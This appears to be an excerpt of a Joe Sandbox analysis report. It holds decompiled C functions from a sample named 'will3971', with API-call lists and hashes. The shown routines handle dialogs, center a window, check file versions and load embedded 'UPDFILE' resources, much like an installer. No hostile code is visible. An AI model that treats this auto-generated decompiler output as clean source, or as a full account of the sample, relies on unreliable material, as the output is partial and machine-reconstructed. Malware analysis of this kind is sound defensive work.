                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                • String ID: CheckTokenMembership$advapi32.dll
                                                • API String ID: 4204503880-1888249752
                                                • Opcode ID: 5a004d6a263dbf208e43242f7f18f224ce1382cf319db861a489943c9de05286
                                                • Instruction ID: 1b14045263fb625120d34731d28dff833e84008fcfaeba1454677503db5c78c5
                                                • Opcode Fuzzy Hash: 5a004d6a263dbf208e43242f7f18f224ce1382cf319db861a489943c9de05286
                                                • Instruction Fuzzy Hash: BD118471E10209EBDB109FA4EC4DBBEBB78EB44791F50017DFA05E2290DA319D20CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t7;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				int _t22;
                                                				struct HWND__* _t24;
                                                
                                                				_t7 = _a8 - 0x10;
                                                				if(_t7 == 0) {
                                                					EndDialog(_a4, 2);
                                                					L11:
                                                					return 1;
                                                				}
                                                				_t11 = _t7 - 0x100;
                                                				if(_t11 == 0) {
                                                					_t12 = GetDesktopWindow();
                                                					_t24 = _a4;
                                                					E002F43D0(_t24, _t12);
                                                					SetWindowTextA(_t24, "lega");
                                                					SetDlgItemTextA(_t24, 0x838,  *0x2f9404);
                                                					SetForegroundWindow(_t24);
                                                					goto L11;
                                                				}
                                                				if(_t11 == 1) {
                                                					_t22 = _a12;
                                                					if(_t22 < 6) {
                                                						goto L11;
                                                					}
                                                					if(_t22 <= 7) {
                                                						L8:
                                                						EndDialog(_a4, _t22);
                                                						return 1;
                                                					}
                                                					if(_t22 != 0x839) {
                                                						goto L11;
                                                					}
                                                					 *0x2f91dc = 1;
                                                					goto L8;
                                                				}
                                                				return 0;
                                                			}








                                                0x002f3459
                                                0x002f345c
                                                0x002f34d8
                                                0x002f34de
                                                0x00000000
                                                0x002f34e0
                                                0x002f345e
                                                0x002f3463
                                                0x002f349a
                                                0x002f34a0
                                                0x002f34a7
                                                0x002f34b2
                                                0x002f34c4
                                                0x002f34cb
                                                0x00000000
                                                0x002f34cb
                                                0x002f3468
                                                0x002f346e
                                                0x002f3474
                                                0x00000000
                                                0x00000000
                                                0x002f347c
                                                0x002f348c
                                                0x002f3490
                                                0x00000000
                                                0x002f3496
                                                0x002f3484
                                                0x00000000
                                                0x00000000
                                                0x002f3486
                                                0x00000000
                                                0x002f3486
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 002F3490
                                                • GetDesktopWindow.USER32 ref: 002F349A
                                                • SetWindowTextA.USER32(?,lega), ref: 002F34B2
                                                • SetDlgItemTextA.USER32(?,00000838), ref: 002F34C4
                                                • SetForegroundWindow.USER32(?), ref: 002F34CB
                                                • EndDialog.USER32(?,00000002), ref: 002F34D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                • String ID: lega
                                                • API String ID: 852535152-245445314
                                                • Opcode ID: 7cff73d7cf5323ffee96fdadeb0b121f9545ad569a064b14a4671cd802a2354b
                                                • Instruction ID: 6e270f991ba60f8f74998d9c809ee0a54fc330e97204e8576ba60c20d0904694
                                                • Opcode Fuzzy Hash: 7cff73d7cf5323ffee96fdadeb0b121f9545ad569a064b14a4671cd802a2354b
                                                • Instruction Fuzzy Hash: 01019271260119ABD7169F64EC0C97FBA64FB457E0F114030FB4B866A0C7709BA1DB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E002F2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				int _t21;
                                                				char _t32;
                                                				intOrPtr _t34;
                                                				char* _t38;
                                                				char _t42;
                                                				char* _t44;
                                                				CHAR* _t52;
                                                				intOrPtr* _t55;
                                                				CHAR* _t59;
                                                				void* _t62;
                                                				CHAR* _t64;
                                                				CHAR* _t65;
                                                				signed int _t66;
                                                
                                                				_t60 = __edx;
                                                				_t16 =  *0x2f8004; // 0x404cc811
                                                				_t17 = _t16 ^ _t66;
                                                				_v8 = _t16 ^ _t66;
                                                				_t65 = _a4;
                                                				_t44 = __edx;
                                                				_t64 = __ecx;
                                                				if( *((char*)(__ecx)) != 0) {
                                                					GetModuleFileNameA( *0x2f9a3c,  &_v268, 0x104);
                                                					while(1) {
                                                						_t17 =  *_t64;
                                                						if(_t17 == 0) {
                                                							break;
                                                						}
                                                						_t21 = IsDBCSLeadByte(_t17);
                                                						 *_t65 =  *_t64;
                                                						if(_t21 != 0) {
                                                							_t65[1] = _t64[1];
                                                						}
                                                						if( *_t64 != 0x23) {
                                                							L19:
                                                							_t65 = CharNextA(_t65);
                                                						} else {
                                                							_t64 = CharNextA(_t64);
                                                							if(CharUpperA( *_t64) != 0x44) {
                                                								if(CharUpperA( *_t64) != 0x45) {
                                                									if( *_t64 == 0x23) {
                                                										goto L19;
                                                									}
                                                								} else {
                                                									E002F1680(_t65, E002F17C8(_t44, _t65),  &_v268);
                                                									_t52 = _t65;
                                                									_t14 =  &(_t52[1]); // 0x2
                                                									_t60 = _t14;
                                                									do {
                                                										_t32 =  *_t52;
                                                										_t52 =  &(_t52[1]);
                                                									} while (_t32 != 0);
                                                									goto L17;
                                                								}
                                                							} else {
                                                								E002F65E8( &_v268);
                                                								_t55 =  &_v268;
                                                								_t62 = _t55 + 1;
                                                								do {
                                                									_t34 =  *_t55;
                                                									_t55 = _t55 + 1;
                                                								} while (_t34 != 0);
                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                									 *_t38 = 0;
                                                								}
                                                								E002F1680(_t65, E002F17C8(_t44, _t65),  &_v268);
                                                								_t59 = _t65;
                                                								_t12 =  &(_t59[1]); // 0x2
                                                								_t60 = _t12;
                                                								do {
                                                									_t42 =  *_t59;
                                                									_t59 =  &(_t59[1]);
                                                								} while (_t42 != 0);
                                                								L17:
                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                							}
                                                						}
                                                						_t64 = CharNextA(_t64);
                                                					}
                                                					 *_t65 = _t17;
                                                				}
                                                				return E002F6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                			}






















                                                0x002f2aac
                                                0x002f2ab7
                                                0x002f2abc
                                                0x002f2abe
                                                0x002f2ac3
                                                0x002f2ac6
                                                0x002f2ac9
                                                0x002f2ace
                                                0x002f2ae6
                                                0x002f2bdc
                                                0x002f2bdc
                                                0x002f2be0
                                                0x00000000
                                                0x00000000
                                                0x002f2af2
                                                0x002f2afc
                                                0x002f2b00
                                                0x002f2b05
                                                0x002f2b05
                                                0x002f2b0b
                                                0x002f2bca
                                                0x002f2bd1
                                                0x002f2b11
                                                0x002f2b18
                                                0x002f2b26
                                                0x002f2b99
                                                0x002f2bc8
                                                0x00000000
                                                0x00000000
                                                0x002f2b9b
                                                0x002f2bae
                                                0x002f2bb3
                                                0x002f2bb5
                                                0x002f2bb5
                                                0x002f2bb8
                                                0x002f2bb8
                                                0x002f2bba
                                                0x002f2bbb
                                                0x00000000
                                                0x002f2bb8
                                                0x002f2b28
                                                0x002f2b2e
                                                0x002f2b33
                                                0x002f2b39
                                                0x002f2b3c
                                                0x002f2b3c
                                                0x002f2b3e
                                                0x002f2b3f
                                                0x002f2b55
                                                0x002f2b5d
                                                0x002f2b64
                                                0x002f2b64
                                                0x002f2b7a
                                                0x002f2b7f
                                                0x002f2b81
                                                0x002f2b81
                                                0x002f2b84
                                                0x002f2b84
                                                0x002f2b86
                                                0x002f2b87
                                                0x002f2bbf
                                                0x002f2bc1
                                                0x002f2bc1
                                                0x002f2b26
                                                0x002f2bda
                                                0x002f2bda
                                                0x002f2be6
                                                0x002f2be6
                                                0x002f2bf8

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 002F2AE6
                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 002F2AF2
                                                • CharNextA.USER32(?), ref: 002F2B12
                                                • CharUpperA.USER32 ref: 002F2B1E
                                                • CharPrevA.USER32(?,?), ref: 002F2B55
                                                • CharNextA.USER32(?), ref: 002F2BD4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                • String ID:
                                                • API String ID: 571164536-0
                                                • Opcode ID: 441832e4800f04b6bb1c8b0e09c005b376555fa1de42065ddb445721fefd9624
                                                • Instruction ID: 24d58c3f36410a826d745306f751c6e744f7639b7ec4b5695734eb890df55afb
                                                • Opcode Fuzzy Hash: 441832e4800f04b6bb1c8b0e09c005b376555fa1de42065ddb445721fefd9624
                                                • Instruction Fuzzy Hash: 5241133411414A9EDB159F20DC58BFEFB699F57394F0400BAD9CA83202DB654EAACB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                				void* _v8;
                                                				char* _v12;
                                                				intOrPtr _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				int _v28;
                                                				char _v32;
                                                				void* _v36;
                                                				int _v40;
                                                				void* _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				long _t68;
                                                				void* _t70;
                                                				void* _t73;
                                                				void* _t79;
                                                				void* _t83;
                                                				void* _t87;
                                                				void* _t88;
                                                				intOrPtr _t93;
                                                				intOrPtr _t97;
                                                				intOrPtr _t99;
                                                				int _t101;
                                                				void* _t103;
                                                				void* _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                
                                                				_v12 = __edx;
                                                				_t99 = __ecx;
                                                				_t106 = 0;
                                                				_v16 = __ecx;
                                                				_t87 = 0;
                                                				_t103 = 0;
                                                				_v20 = 0;
                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                					L19:
                                                					_t106 = 1;
                                                				} else {
                                                					_t62 = 0;
                                                					_v8 = 0;
                                                					while(1) {
                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                						if(E002F2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                							goto L20;
                                                						}
                                                						_t11 =  &_v32; // 0x2f3938
                                                						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                						_v28 = _t68;
                                                						if(_t68 == 0) {
                                                							_t99 = _v16;
                                                							_t70 = _v8 + _t99;
                                                							_t93 = _v24;
                                                							_t87 = _v20;
                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                								goto L18;
                                                							}
                                                						} else {
                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                							if(_t103 != 0) {
                                                								_t73 = GlobalLock(_t103);
                                                								_v36 = _t73;
                                                								if(_t73 != 0) {
                                                									_t16 =  &_v32; // 0x2f3938
                                                									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                										L15:
                                                										GlobalUnlock(_t103);
                                                										_t99 = _v16;
                                                										L18:
                                                										_t87 = _t87 + 1;
                                                										_t62 = _v8 + 0x3c;
                                                										_v20 = _t87;
                                                										_v8 = _v8 + 0x3c;
                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                											continue;
                                                										} else {
                                                											goto L19;
                                                										}
                                                									} else {
                                                										_t79 = _v44;
                                                										_t88 = _t106;
                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                										_t101 = _v28;
                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                										_t97 = _v48;
                                                										_v36 = _t83;
                                                										_t109 = _t83;
                                                										do {
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E002F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E002F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                											_t109 = _t109 + 0x18;
                                                											_t88 = _t88 + 4;
                                                										} while (_t88 < 8);
                                                										_t87 = _v20;
                                                										_t106 = 0;
                                                										if(_v56 < 0 || _v64 > 0) {
                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                												GlobalUnlock(_t103);
                                                											} else {
                                                												goto L15;
                                                											}
                                                										} else {
                                                											goto L15;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                				}
                                                				L20:
                                                				 *_a8 = _t87;
                                                				if(_t103 != 0) {
                                                					GlobalFree(_t103);
                                                				}
                                                				return _t106;
                                                			}

































                                                0x002f28f1
                                                0x002f28f4
                                                0x002f28f7
                                                0x002f28f9
                                                0x002f28fc
                                                0x002f28ff
                                                0x002f2901
                                                0x002f2907
                                                0x002f2a62
                                                0x002f2a64
                                                0x002f290d
                                                0x002f290d
                                                0x002f290f
                                                0x002f2912
                                                0x002f2920
                                                0x002f2937
                                                0x00000000
                                                0x00000000
                                                0x002f293d
                                                0x002f2944
                                                0x002f294a
                                                0x002f294f
                                                0x002f2a2f
                                                0x002f2a32
                                                0x002f2a34
                                                0x002f2a37
                                                0x002f2a41
                                                0x00000000
                                                0x00000000
                                                0x002f2955
                                                0x002f295e
                                                0x002f2962
                                                0x002f2969
                                                0x002f296f
                                                0x002f2974
                                                0x002f297e
                                                0x002f298c
                                                0x002f2a20
                                                0x002f2a21
                                                0x002f2a27
                                                0x002f2a4c
                                                0x002f2a4f
                                                0x002f2a50
                                                0x002f2a53
                                                0x002f2a56
                                                0x002f2a5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f29b2
                                                0x002f29b2
                                                0x002f29b5
                                                0x002f29bd
                                                0x002f29c3
                                                0x002f29cc
                                                0x002f29d5
                                                0x002f29d7
                                                0x002f29da
                                                0x002f29dd
                                                0x002f29df
                                                0x002f29ec
                                                0x002f29f8
                                                0x002f29fc
                                                0x002f29ff
                                                0x002f2a02
                                                0x002f2a07
                                                0x002f2a0a
                                                0x002f2a0f
                                                0x002f2a19
                                                0x002f2a81
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f2a0f
                                                0x002f298c
                                                0x002f2974
                                                0x002f2962
                                                0x00000000
                                                0x002f294f
                                                0x002f2912
                                                0x002f2a65
                                                0x002f2a68
                                                0x002f2a6c
                                                0x002f2a6f
                                                0x002f2a6f
                                                0x002f2a7d

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 002F2A6F
                                                  • Part of subcall function 002F2773: CharUpperA.USER32(404CC811,00000000,00000000,00000000), ref: 002F27A8
                                                  • Part of subcall function 002F2773: CharNextA.USER32(0000054D), ref: 002F27B5
                                                  • Part of subcall function 002F2773: CharNextA.USER32(00000000), ref: 002F27BC
                                                  • Part of subcall function 002F2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2829
                                                  • Part of subcall function 002F2773: RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2852
                                                  • Part of subcall function 002F2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2870
                                                  • Part of subcall function 002F2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F28A0
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,002F3938,?,?,?,?,-00000005), ref: 002F2958
                                                • GlobalLock.KERNEL32 ref: 002F2969
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,002F3938,?,?,?,?,-00000005,?), ref: 002F2A21
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,002F3938,?,?), ref: 002F2A81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                • String ID: 89/
                                                • API String ID: 3949799724-1886182873
                                                • Opcode ID: 3a92ec550343f6d85ae8f5596d9b08dadb2bd6b84387a1a234267161957bc7f4
                                                • Instruction ID: c7fe34c9fc78666a531faabc00f69e99ba02107ddfae73050dde6e4643659146
                                                • Opcode Fuzzy Hash: 3a92ec550343f6d85ae8f5596d9b08dadb2bd6b84387a1a234267161957bc7f4
                                                • Instruction Fuzzy Hash: AA512571A1021ADBDB21CF98D884ABEFBB5FF49750F14403AEA05E3251DB319965CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E002F43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                				signed int _v8;
                                                				struct tagRECT _v24;
                                                				struct tagRECT _v40;
                                                				struct HWND__* _v44;
                                                				intOrPtr _v48;
                                                				int _v52;
                                                				intOrPtr _v56;
                                                				int _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				void* _t53;
                                                				intOrPtr _t56;
                                                				int _t59;
                                                				struct HWND__* _t63;
                                                				struct HWND__* _t67;
                                                				struct HWND__* _t68;
                                                				struct HDC__* _t69;
                                                				int _t72;
                                                				signed int _t74;
                                                
                                                				_t63 = __edx;
                                                				_t29 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t29 ^ _t74;
                                                				_t68 = __edx;
                                                				_v44 = __ecx;
                                                				GetWindowRect(__ecx,  &_v40);
                                                				_t53 = _v40.bottom - _v40.top;
                                                				_v48 = _v40.right - _v40.left;
                                                				GetWindowRect(_t68,  &_v24);
                                                				_v56 = _v24.bottom - _v24.top;
                                                				_t69 = GetDC(_v44);
                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                				ReleaseDC(_v44, _t69);
                                                				_t56 = _v48;
                                                				asm("cdq");
                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                				_t67 = 0;
                                                				if(_t72 >= 0) {
                                                					_t63 = _v52;
                                                					if(_t72 + _t56 > _t63) {
                                                						_t72 = _t63 - _t56;
                                                					}
                                                				} else {
                                                					_t72 = _t67;
                                                				}
                                                				asm("cdq");
                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                				if(_t59 >= 0) {
                                                					_t63 = _v60;
                                                					if(_t59 + _t53 > _t63) {
                                                						_t59 = _t63 - _t53;
                                                					}
                                                				} else {
                                                					_t59 = _t67;
                                                				}
                                                				return E002F6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                			}
























                                                0x002f43d0
                                                0x002f43d8
                                                0x002f43df
                                                0x002f43e6
                                                0x002f43ec
                                                0x002f43f1
                                                0x002f4400
                                                0x002f4403
                                                0x002f440b
                                                0x002f4420
                                                0x002f4429
                                                0x002f4437
                                                0x002f4444
                                                0x002f4447
                                                0x002f444d
                                                0x002f4454
                                                0x002f445b
                                                0x002f4460
                                                0x002f4461
                                                0x002f4467
                                                0x002f446f
                                                0x002f4473
                                                0x002f4473
                                                0x002f4463
                                                0x002f4463
                                                0x002f4463
                                                0x002f447a
                                                0x002f4481
                                                0x002f4484
                                                0x002f448a
                                                0x002f4492
                                                0x002f4496
                                                0x002f4496
                                                0x002f4486
                                                0x002f4486
                                                0x002f4486
                                                0x002f44b8

                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 002F43F1
                                                • GetWindowRect.USER32(00000000,?), ref: 002F440B
                                                • GetDC.USER32(?), ref: 002F4423
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 002F442E
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 002F443A
                                                • ReleaseDC.USER32(?,00000000), ref: 002F4447
                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 002F44A2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Window$CapsDeviceRect$Release
                                                • String ID:
                                                • API String ID: 2212493051-0
                                                • Opcode ID: a0e52f0c524671f4a72690abc63779c2e292e5c7015d861f076fe74ff6867379
                                                • Instruction ID: adfc6e48bef7062ff73ae22220ae05c65e2e8e6cbfd209e7c6ac3cca321d2465
                                                • Opcode Fuzzy Hash: a0e52f0c524671f4a72690abc63779c2e292e5c7015d861f076fe74ff6867379
                                                • Instruction Fuzzy Hash: 90313772A10119AFCB14DFB8ED889FEBBB5EB89350F154169E909B3240DA70AC05CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E002F6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                				signed int _v8;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				struct HINSTANCE__* _v36;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				struct HRSRC__* _t21;
                                                				intOrPtr _t26;
                                                				void* _t30;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr* _t40;
                                                				void* _t41;
                                                				intOrPtr* _t44;
                                                				intOrPtr* _t45;
                                                				void* _t47;
                                                				signed int _t50;
                                                				struct HINSTANCE__* _t51;
                                                
                                                				_t44 = __edx;
                                                				_t16 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t16 ^ _t50;
                                                				_t46 = 0;
                                                				_v32 = __ecx;
                                                				_v36 = 0;
                                                				_t36 = 1;
                                                				E002F171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                				while(1) {
                                                					_t51 = _t51 + 0x10;
                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                					if(_t21 == 0) {
                                                						break;
                                                					}
                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                					if(_t45 == 0) {
                                                						 *0x2f9124 = 0x80070714;
                                                						_t36 = _t46;
                                                					} else {
                                                						_t5 = _t45 + 8; // 0x8
                                                						_t44 = _t5;
                                                						_t40 = _t44;
                                                						_t6 = _t40 + 1; // 0x9
                                                						_t47 = _t6;
                                                						do {
                                                							_t26 =  *_t40;
                                                							_t40 = _t40 + 1;
                                                						} while (_t26 != 0);
                                                						_t41 = _t40 - _t47;
                                                						_t46 = _t51;
                                                						_t7 = _t41 + 1; // 0xa
                                                						 *0x2fa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                						_t30 = _v32();
                                                						if(_t51 != _t51) {
                                                							asm("int 0x29");
                                                						}
                                                						_push(_t45);
                                                						if(_t30 == 0) {
                                                							_t36 = 0;
                                                							FreeResource(??);
                                                						} else {
                                                							FreeResource();
                                                							_v36 = _v36 + 1;
                                                							E002F171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                							_t46 = 0;
                                                							continue;
                                                						}
                                                					}
                                                					L12:
                                                					return E002F6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                				}
                                                				goto L12;
                                                			}






















                                                0x002f6298
                                                0x002f62a0
                                                0x002f62a7
                                                0x002f62ad
                                                0x002f62af
                                                0x002f62bb
                                                0x002f62c3
                                                0x002f62c4
                                                0x002f633b
                                                0x002f633b
                                                0x002f6345
                                                0x002f634d
                                                0x00000000
                                                0x00000000
                                                0x002f62da
                                                0x002f62de
                                                0x002f635f
                                                0x002f6369
                                                0x002f62e0
                                                0x002f62e0
                                                0x002f62e0
                                                0x002f62e3
                                                0x002f62e5
                                                0x002f62e5
                                                0x002f62e8
                                                0x002f62e8
                                                0x002f62ea
                                                0x002f62eb
                                                0x002f62ef
                                                0x002f62f1
                                                0x002f62f3
                                                0x002f6302
                                                0x002f6308
                                                0x002f630d
                                                0x002f6314
                                                0x002f6314
                                                0x002f6316
                                                0x002f6319
                                                0x002f6355
                                                0x002f6357
                                                0x002f631b
                                                0x002f631b
                                                0x002f6331
                                                0x002f6334
                                                0x002f6339
                                                0x00000000
                                                0x002f6339
                                                0x002f6319
                                                0x002f636b
                                                0x002f637d
                                                0x002f637d
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002F171E: _vsnprintf.MSVCRT ref: 002F1750
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F62CD
                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F62D4
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F631B
                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 002F6345
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002F51CA,00000004,00000024,002F2F71,?,00000002,00000000), ref: 002F6357
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                • String ID: UPDFILE%lu
                                                • API String ID: 2922116661-2329316264
                                                • Opcode ID: dc82a22d03394d7917a149cdc2c57b89ff42c0bbf611a3dc7e2265b948a5aa9a
                                                • Instruction ID: e2ad1d6fc3f81ce5f595cc9ad7760bb12cf364508f8febefa43cbf67b68255a4
                                                • Opcode Fuzzy Hash: dc82a22d03394d7917a149cdc2c57b89ff42c0bbf611a3dc7e2265b948a5aa9a
                                                • Instruction Fuzzy Hash: 6721F875A1021D9BDB109F64AC4D9BFFB78EB45790B000179FA06A3241DB759D21CBE1
